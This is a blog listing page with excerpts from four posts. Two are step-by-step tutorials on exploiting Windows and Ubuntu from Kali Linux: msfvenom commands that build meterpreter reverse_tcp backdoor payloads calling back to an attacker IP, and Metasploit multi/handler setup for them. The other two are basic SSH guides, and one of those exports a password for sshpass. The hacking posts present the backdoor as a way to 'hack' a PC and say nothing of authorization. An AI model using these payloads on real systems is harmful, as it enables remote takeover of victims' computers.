Posts

How to Exploit Windows using Kali Linux

Image
How to Exploit Windows using Kali Linux Step 1: Creating the Payload To Hack Windows we need to create a payload that will act as a backdoor for us to get into that PC. To create payload for windows. Open terminal and Type msfvenom -p windows/meterpreter/reverse_tcp LHOST=IP LPORT=4444  -f exe -o /root/Desktop/win.exe Step 2: Starting the Metasploit Framework Console For controlling the payload we need to start the Metasploit Framework Concole which is prebuilt in Kali Linux. The Metasploit Framework Console has many payloads and many exploit method. To start the Metasploit Framework Console. In the terminal type msfconsole Step 3: Choosing the Exploit Method As I have said the Metasploit Framework Console has many exploitation method. In this we will use the multi handler. Type use exploit/multi/handler Step 4: Setting the Payload In above step we set our exploitation method. In this step we need to specify the payload that we have created. T...

SSH Password Authentication

Image
SSH Password Authentication Type  - 1.  ssh-keygen             2.  ls .ssh Create ssh key https://www.digitalocean.com/community/tutorials/how-to-set-up-ssh-keys--2 Copy in Terminal cat ~/.ssh/id_rsa.pub | ssh noob@192.168.0.104 "mkdir -p ~/.ssh && chmod 700 ~/.ssh && cat >>  ~/.ssh/authorized_keys" Share file scp  test.txt  noob@192.168.0.104:~ SSHPASS Type -           1.export SSHPASS="Password"           2.sshpass  -e  ssh  username@serverip

What is SSH?

Image
Securely Connecting To Your Web Sever Using SSH What is SSH? SSH (Secure Shell) is a terminal program that allows you to securely connect to another machine – in this case,  your server. This connection gives you the ability to manage your server from your local computer. SSH is a tool that gives you extra functionality that is not always included in your control center. While SSH may appear daunting at first, it is a necessity for getting the most out of your hosting account. Using SSH on Windows Windows systems don’t have a built-in SSH client. In order to use SSH on a Windows computer, you will have to download one. We recommend using PUTTY , which is free, or SecureCRT . Once you have downloaded an SSH client, like PUTTY, you will need to connect to your server. How you would do this in PUTTY would be to open the program, enter your hostname, and click Open . If this is your first time connecting, you may get a warning asking if you trust the server. Just cli...

HOW TO EXPLOIT UBUNTU USING KALI LINUX

Image
How To Exploit UBUNTU Using KALI LINUX Requirements: 1. Metasploit framework (we use Kali Linux 1.0.6 in this tutorial) STEPS:  1. Open terminal (CTRL + ALT + T)  2. We will utilize Metasploit payload framework to create exploit for this tutorial. msfvenom python/meterpreter/reverse_tcp LHOST=<attacker_ip_address> LPORT=<port_to_receive_connection> -o /var/www/html/payloadname.py As described above that attacker IP address is 192.168.43.185, below is our screenshot when executed the command 3. Because our payload is reverse_tcp where attacker expect the victim to connect back to attacker machine, attacker needs to set up the handler to handle incoming connections to the port already specified above. Type  msfconsole to go to Metasploit console. Info: use exploit/multi/handler –> we will use Metasploit handler set payload python/meterpreter/reverse_tcp –> make sure the payload is the same with step 2 ...